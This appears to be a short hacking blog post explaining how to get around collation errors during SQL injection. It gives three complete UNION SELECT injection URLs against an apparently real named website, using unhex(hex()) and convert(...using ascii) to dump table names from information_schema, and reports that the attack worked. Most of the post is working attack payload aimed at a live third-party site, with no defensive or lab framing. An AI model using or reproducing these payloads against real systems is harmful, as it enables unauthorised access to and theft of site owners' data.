That error cames up,when the char is not set as default.
Example :
http://www.elansystems.co.za/product-item.php?product_items_id=-13+UNION+SELECT+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()–
We can bypass it with this syntax :
unhex(hex(group_concat(table_name)))
So our syntax will be look like this :
http://www.elansystems.co.za/product-item.php?product_items_id=-13+UNION+SELECT+1,2,3,4,5,6,7,8,unhex(hex(group_concat(table_name))),10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()–
It works. Tables cames up.
If don’t works you can try in this way too :
http://www.elansystems.co.za/product-item.php?product_items_id=-13+UNION+SELECT+1,2,3,4,5,6,7,8,convert(group_concat(table_name)+using+ascii),10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()–
No comments:
Post a Comment